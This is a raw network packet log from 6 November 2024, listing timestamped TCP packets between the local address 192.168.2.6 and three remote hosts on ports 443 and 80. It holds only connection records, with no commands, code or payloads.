                                              Nov 6, 2024 17:02:47.764699936 CET44356849188.114.96.3192.168.2.6
                                              Nov 6, 2024 17:02:47.779933929 CET8056843193.122.6.168192.168.2.6
                                              Nov 6, 2024 17:02:47.783888102 CET5684380192.168.2.6193.122.6.168
                                              Nov 6, 2024 17:02:47.788769007 CET8056843193.122.6.168192.168.2.6
                                              Nov 6, 2024 17:02:47.860061884 CET4435684613.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:47.860145092 CET4435684613.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:47.860301971 CET56846443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:47.860449076 CET56846443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:47.860471964 CET4435684613.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:47.860481977 CET56846443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:47.860487938 CET4435684613.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:47.862966061 CET56851443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:47.862996101 CET4435685113.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:47.863079071 CET56851443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:47.863193035 CET56851443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:47.863208055 CET4435685113.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:47.872545958 CET4435684813.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:47.872766018 CET4435684813.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:47.872819901 CET56848443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:47.872859001 CET56848443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:47.872876883 CET4435684813.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:47.872888088 CET56848443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:47.872894049 CET4435684813.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:47.873567104 CET4435684713.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:47.874156952 CET4435684713.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:47.874202967 CET56847443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:47.874228954 CET56847443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:47.874239922 CET4435684713.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:47.874248981 CET56847443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:47.874253988 CET4435684713.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:47.875109911 CET56852443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:47.875123024 CET4435685213.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:47.875283957 CET56852443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:47.875408888 CET56852443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:47.875420094 CET4435685213.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:47.875755072 CET4435684413.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:47.876029015 CET4435684413.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:47.876077890 CET56844443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:47.876091957 CET56844443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:47.876100063 CET4435684413.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:47.876108885 CET56844443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:47.876112938 CET4435684413.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:47.876883030 CET56853443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:47.876890898 CET4435685313.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:47.877011061 CET56853443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:47.877114058 CET56853443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:47.877123117 CET4435685313.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:47.877974987 CET56854443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:47.877995014 CET4435685413.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:47.878060102 CET56854443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:47.878161907 CET56854443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:47.878173113 CET4435685413.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:47.881568909 CET4435684513.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:47.881889105 CET4435684513.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:47.881952047 CET56845443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:47.881966114 CET56845443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:47.881972075 CET4435684513.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:47.881995916 CET56845443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:47.881999969 CET4435684513.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:47.883862019 CET56855443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:47.883868933 CET4435685513.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:47.883966923 CET56855443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:47.884077072 CET56855443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:47.884085894 CET4435685513.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:47.919703960 CET44356849188.114.96.3192.168.2.6
                                              Nov 6, 2024 17:02:47.919775009 CET44356849188.114.96.3192.168.2.6
                                              Nov 6, 2024 17:02:47.919835091 CET56849443192.168.2.6188.114.96.3
                                              Nov 6, 2024 17:02:47.920270920 CET56849443192.168.2.6188.114.96.3
                                              Nov 6, 2024 17:02:47.923906088 CET5684180192.168.2.6193.122.6.168
                                              Nov 6, 2024 17:02:47.925062895 CET5685680192.168.2.6193.122.6.168
                                              Nov 6, 2024 17:02:47.929326057 CET8056841193.122.6.168192.168.2.6
                                              Nov 6, 2024 17:02:47.929371119 CET5684180192.168.2.6193.122.6.168
                                              Nov 6, 2024 17:02:47.929924965 CET8056856193.122.6.168192.168.2.6
                                              Nov 6, 2024 17:02:47.929996967 CET5685680192.168.2.6193.122.6.168
                                              Nov 6, 2024 17:02:47.930090904 CET5685680192.168.2.6193.122.6.168
                                              Nov 6, 2024 17:02:47.934866905 CET8056856193.122.6.168192.168.2.6
                                              Nov 6, 2024 17:02:48.030507088 CET8056843193.122.6.168192.168.2.6
                                              Nov 6, 2024 17:02:48.074126959 CET56857443192.168.2.6188.114.96.3
                                              Nov 6, 2024 17:02:48.074151039 CET44356857188.114.96.3192.168.2.6
                                              Nov 6, 2024 17:02:48.074224949 CET56857443192.168.2.6188.114.96.3
                                              Nov 6, 2024 17:02:48.078587055 CET56857443192.168.2.6188.114.96.3
                                              Nov 6, 2024 17:02:48.078597069 CET44356857188.114.96.3192.168.2.6
                                              Nov 6, 2024 17:02:48.224050045 CET5684380192.168.2.6193.122.6.168
                                              Nov 6, 2024 17:02:48.614645958 CET4435685413.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:48.615004063 CET4435685313.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:48.621594906 CET4435685513.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:48.623557091 CET4435685113.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:48.641586065 CET56854443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:48.641608953 CET4435685413.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:48.645483971 CET56854443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:48.645488977 CET4435685413.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:48.653016090 CET56853443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:48.653024912 CET4435685313.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:48.657613039 CET56853443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:48.657618999 CET4435685313.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:48.677210093 CET56855443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:48.713579893 CET56855443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:48.713606119 CET4435685513.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:48.717365980 CET56855443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:48.717371941 CET4435685513.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:48.717753887 CET56851443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:48.717778921 CET4435685113.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:48.718245029 CET56851443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:48.718250036 CET4435685113.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:48.734371901 CET44356857188.114.96.3192.168.2.6
                                              Nov 6, 2024 17:02:48.734447002 CET56857443192.168.2.6188.114.96.3
                                              Nov 6, 2024 17:02:48.767699003 CET8056856193.122.6.168192.168.2.6
                                              Nov 6, 2024 17:02:48.770385981 CET4435685413.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:48.770982027 CET4435685413.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:48.771061897 CET56854443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:48.772913933 CET56858443192.168.2.6188.114.96.3
                                              Nov 6, 2024 17:02:48.772950888 CET44356858188.114.96.3192.168.2.6
                                              Nov 6, 2024 17:02:48.773032904 CET56858443192.168.2.6188.114.96.3
                                              Nov 6, 2024 17:02:48.773313999 CET56858443192.168.2.6188.114.96.3
                                              Nov 6, 2024 17:02:48.773324013 CET44356858188.114.96.3192.168.2.6
                                              Nov 6, 2024 17:02:48.776379108 CET56854443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:48.776410103 CET4435685413.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:48.776427031 CET56854443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:48.776432991 CET4435685413.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:48.780982971 CET4435685313.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:48.781039953 CET4435685313.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:48.781090021 CET56853443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:48.789874077 CET56853443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:48.789897919 CET4435685313.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:48.789912939 CET56853443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:48.789918900 CET4435685313.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:48.817797899 CET5685680192.168.2.6193.122.6.168
                                              Nov 6, 2024 17:02:48.842746019 CET4435685513.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:48.842809916 CET4435685513.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:48.842938900 CET56855443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:48.844577074 CET4435685113.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:48.844954967 CET4435685113.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:48.845881939 CET56851443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:48.887593985 CET56855443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:48.887639046 CET4435685513.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:48.887655973 CET56855443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:48.887662888 CET4435685513.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:48.889209986 CET56851443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:48.889209986 CET56851443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:48.889235973 CET4435685113.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:48.889246941 CET4435685113.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:48.890264034 CET56857443192.168.2.6188.114.96.3
                                              Nov 6, 2024 17:02:48.890286922 CET44356857188.114.96.3192.168.2.6
                                              Nov 6, 2024 17:02:48.890628099 CET44356857188.114.96.3192.168.2.6
                                              Nov 6, 2024 17:02:48.892026901 CET56859443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:48.892066002 CET4435685913.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:48.892117977 CET56859443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:48.893695116 CET56859443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:48.893711090 CET4435685913.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:48.898324013 CET56860443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:48.898355961 CET4435686013.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:48.898416996 CET56860443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:48.898947954 CET56860443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:48.898971081 CET4435686013.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:49.036536932 CET56857443192.168.2.6188.114.96.3
                                              Nov 6, 2024 17:02:49.209569931 CET56861443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:49.209621906 CET4435686113.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:49.209685087 CET56861443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:49.210526943 CET56862443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:49.210578918 CET4435686213.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:49.210624933 CET56862443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:49.228791952 CET56861443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:49.228812933 CET4435686113.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:49.229070902 CET56862443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:49.229094028 CET4435686213.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:49.391725063 CET44356858188.114.96.3192.168.2.6
                                              Nov 6, 2024 17:02:49.393695116 CET56858443192.168.2.6188.114.96.3
                                              Nov 6, 2024 17:02:49.393728971 CET44356858188.114.96.3192.168.2.6
                                              Nov 6, 2024 17:02:49.559844971 CET44356858188.114.96.3192.168.2.6
                                              Nov 6, 2024 17:02:49.559931993 CET44356858188.114.96.3192.168.2.6
                                              Nov 6, 2024 17:02:49.559969902 CET56858443192.168.2.6188.114.96.3
                                              Nov 6, 2024 17:02:49.560689926 CET56858443192.168.2.6188.114.96.3
                                              Nov 6, 2024 17:02:49.564651966 CET5685680192.168.2.6193.122.6.168
                                              Nov 6, 2024 17:02:49.566005945 CET5686480192.168.2.6193.122.6.168
                                              Nov 6, 2024 17:02:49.569946051 CET8056856193.122.6.168192.168.2.6
                                              Nov 6, 2024 17:02:49.569992065 CET5685680192.168.2.6193.122.6.168
                                              Nov 6, 2024 17:02:49.571082115 CET8056864193.122.6.168192.168.2.6
                                              Nov 6, 2024 17:02:49.571141005 CET5686480192.168.2.6193.122.6.168
                                              Nov 6, 2024 17:02:49.571244955 CET5686480192.168.2.6193.122.6.168
                                              Nov 6, 2024 17:02:49.576134920 CET8056864193.122.6.168192.168.2.6
                                              Nov 6, 2024 17:02:49.619774103 CET4435686013.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:49.621393919 CET56860443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:49.621414900 CET4435686013.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:49.622222900 CET56860443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:49.622227907 CET4435686013.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:49.633713007 CET4435685913.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:49.634047985 CET56859443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:49.634061098 CET4435685913.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:49.634462118 CET56859443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:49.634464979 CET4435685913.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:49.646945953 CET56857443192.168.2.6188.114.96.3
                                              Nov 6, 2024 17:02:49.656512022 CET4435685213.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:49.656867027 CET56852443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:49.656896114 CET4435685213.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:49.657305956 CET56852443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:49.657314062 CET4435685213.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:49.691327095 CET44356857188.114.96.3192.168.2.6
                                              Nov 6, 2024 17:02:49.752587080 CET4435686013.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:49.752652884 CET4435686013.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:49.752691984 CET56860443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:49.753171921 CET56860443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:49.753189087 CET4435686013.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:49.753207922 CET56860443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:49.753215075 CET4435686013.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:49.756423950 CET56865443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:49.756458044 CET4435686513.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:49.756534100 CET56865443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:49.756655931 CET56865443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:49.756664038 CET4435686513.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:49.766444921 CET4435685913.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:49.766971111 CET4435685913.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:49.767020941 CET56859443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:49.767111063 CET56859443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:49.767131090 CET4435685913.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:49.767146111 CET56859443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:49.767152071 CET4435685913.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:49.769423962 CET56866443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:49.769470930 CET4435686613.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:49.769524097 CET56866443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:49.769660950 CET56866443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:49.769674063 CET4435686613.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:49.791935921 CET4435685213.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:49.792051077 CET4435685213.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:49.792107105 CET56852443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:49.792309999 CET56852443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:49.792324066 CET4435685213.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:49.792339087 CET56852443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:49.792344093 CET4435685213.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:49.795281887 CET56867443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:49.795321941 CET4435686713.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:49.795389891 CET56867443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:49.795559883 CET56867443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:49.795567036 CET4435686713.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:49.796036959 CET44356857188.114.96.3192.168.2.6
                                              Nov 6, 2024 17:02:49.796128035 CET44356857188.114.96.3192.168.2.6
                                              Nov 6, 2024 17:02:49.796174049 CET56857443192.168.2.6188.114.96.3
                                              Nov 6, 2024 17:02:49.799810886 CET56857443192.168.2.6188.114.96.3
                                              Nov 6, 2024 17:02:49.804191113 CET5684380192.168.2.6193.122.6.168
                                              Nov 6, 2024 17:02:49.809091091 CET8056843193.122.6.168192.168.2.6
                                              Nov 6, 2024 17:02:50.287190914 CET8056843193.122.6.168192.168.2.6
                                              Nov 6, 2024 17:02:50.288029909 CET8056843193.122.6.168192.168.2.6
                                              Nov 6, 2024 17:02:50.288091898 CET5684380192.168.2.6193.122.6.168
                                              Nov 6, 2024 17:02:50.288569927 CET4435686113.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:50.290314913 CET56861443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:50.290342093 CET4435686113.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:50.293836117 CET56861443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:50.293840885 CET4435686113.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:50.295183897 CET56868443192.168.2.6188.114.96.3
                                              Nov 6, 2024 17:02:50.295213938 CET44356868188.114.96.3192.168.2.6
                                              Nov 6, 2024 17:02:50.295293093 CET56868443192.168.2.6188.114.96.3
                                              Nov 6, 2024 17:02:50.295535088 CET56868443192.168.2.6188.114.96.3
                                              Nov 6, 2024 17:02:50.295552969 CET44356868188.114.96.3192.168.2.6
                                              Nov 6, 2024 17:02:50.397782087 CET8056864193.122.6.168192.168.2.6
                                              Nov 6, 2024 17:02:50.399274111 CET56869443192.168.2.6188.114.96.3
                                              Nov 6, 2024 17:02:50.399336100 CET44356869188.114.96.3192.168.2.6
                                              Nov 6, 2024 17:02:50.399914026 CET56869443192.168.2.6188.114.96.3
                                              Nov 6, 2024 17:02:50.400147915 CET56869443192.168.2.6188.114.96.3
                                              Nov 6, 2024 17:02:50.400157928 CET44356869188.114.96.3192.168.2.6
                                              Nov 6, 2024 17:02:50.425235033 CET4435686113.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:50.425483942 CET4435686113.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:50.425733089 CET56861443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:50.425733089 CET56861443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:50.425795078 CET56861443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:50.425812006 CET4435686113.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:50.428672075 CET56870443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:50.428709030 CET4435687013.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:50.429925919 CET56870443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:50.430016994 CET56870443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:50.430026054 CET4435687013.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:50.497684002 CET4435686513.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:50.500411034 CET56865443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:50.500411987 CET56865443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:50.500457048 CET4435686513.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:50.500472069 CET4435686513.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:50.529516935 CET4435686713.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:50.530472040 CET56867443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:50.530472040 CET56867443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:50.530507088 CET4435686713.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:50.530523062 CET4435686713.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:50.536686897 CET5686480192.168.2.6193.122.6.168
                                              Nov 6, 2024 17:02:50.543325901 CET4435686613.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:50.543806076 CET56866443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:50.543831110 CET4435686613.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:50.545840979 CET56866443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:50.545847893 CET4435686613.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:50.627862930 CET4435686513.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:50.627932072 CET4435686513.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:50.627999067 CET56865443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:50.628227949 CET56865443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:50.628227949 CET56865443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:50.628247023 CET4435686513.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:50.628256083 CET4435686513.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:50.631092072 CET56871443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:50.631128073 CET4435687113.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:50.631268024 CET56871443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:50.631508112 CET56871443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:50.631520987 CET4435687113.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:50.684722900 CET4435686613.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:50.686253071 CET4435686613.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:50.686400890 CET56866443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:50.686454058 CET56866443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:50.686454058 CET56866443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:50.686467886 CET4435686613.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:50.686477900 CET4435686613.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:50.689070940 CET56872443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:50.689095974 CET4435687213.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:50.689409018 CET56872443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:50.689960957 CET56872443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:50.689974070 CET4435687213.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:50.768556118 CET4435686713.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:50.768666029 CET4435686713.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:50.768742085 CET56867443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:50.769095898 CET56867443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:50.769100904 CET4435686713.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:50.769129038 CET56867443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:50.769131899 CET4435686713.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:50.771650076 CET56873443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:50.771703005 CET4435687313.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:50.771857023 CET56873443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:50.771940947 CET56873443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:50.771949053 CET4435687313.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:50.900100946 CET44356868188.114.96.3192.168.2.6
                                              Nov 6, 2024 17:02:50.915188074 CET56868443192.168.2.6188.114.96.3
                                              Nov 6, 2024 17:02:50.915215015 CET44356868188.114.96.3192.168.2.6
                                              Nov 6, 2024 17:02:51.012209892 CET44356869188.114.96.3192.168.2.6
                                              Nov 6, 2024 17:02:51.021519899 CET56869443192.168.2.6188.114.96.3
                                              Nov 6, 2024 17:02:51.021553993 CET44356869188.114.96.3192.168.2.6
                                              Nov 6, 2024 17:02:51.072385073 CET44356868188.114.96.3192.168.2.6
                                              Nov 6, 2024 17:02:51.072473049 CET44356868188.114.96.3192.168.2.6
                                              Nov 6, 2024 17:02:51.074955940 CET56868443192.168.2.6188.114.96.3
                                              Nov 6, 2024 17:02:51.075417042 CET56868443192.168.2.6188.114.96.3
                                              Nov 6, 2024 17:02:51.079356909 CET5687480192.168.2.6193.122.6.168
                                              Nov 6, 2024 17:02:51.079356909 CET5684380192.168.2.6193.122.6.168
                                              Nov 6, 2024 17:02:51.084742069 CET8056874193.122.6.168192.168.2.6
                                              Nov 6, 2024 17:02:51.084826946 CET5687480192.168.2.6193.122.6.168
                                              Nov 6, 2024 17:02:51.085011005 CET5687480192.168.2.6193.122.6.168
                                              Nov 6, 2024 17:02:51.091062069 CET8056874193.122.6.168192.168.2.6
                                              Nov 6, 2024 17:02:51.113651037 CET8056843193.122.6.168192.168.2.6
                                              Nov 6, 2024 17:02:51.113786936 CET5684380192.168.2.6193.122.6.168
                                              Nov 6, 2024 17:02:51.152121067 CET4435687013.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:51.153837919 CET56870443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:51.153863907 CET4435687013.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:51.154201984 CET56870443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:51.154207945 CET4435687013.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:51.172007084 CET44356869188.114.96.3192.168.2.6
                                              Nov 6, 2024 17:02:51.172106028 CET44356869188.114.96.3192.168.2.6
                                              Nov 6, 2024 17:02:51.172399044 CET56869443192.168.2.6188.114.96.3
                                              Nov 6, 2024 17:02:51.173837900 CET56869443192.168.2.6188.114.96.3
                                              Nov 6, 2024 17:02:51.176871061 CET5686480192.168.2.6193.122.6.168
                                              Nov 6, 2024 17:02:51.177850962 CET5687580192.168.2.6193.122.6.168
                                              Nov 6, 2024 17:02:51.182254076 CET8056864193.122.6.168192.168.2.6
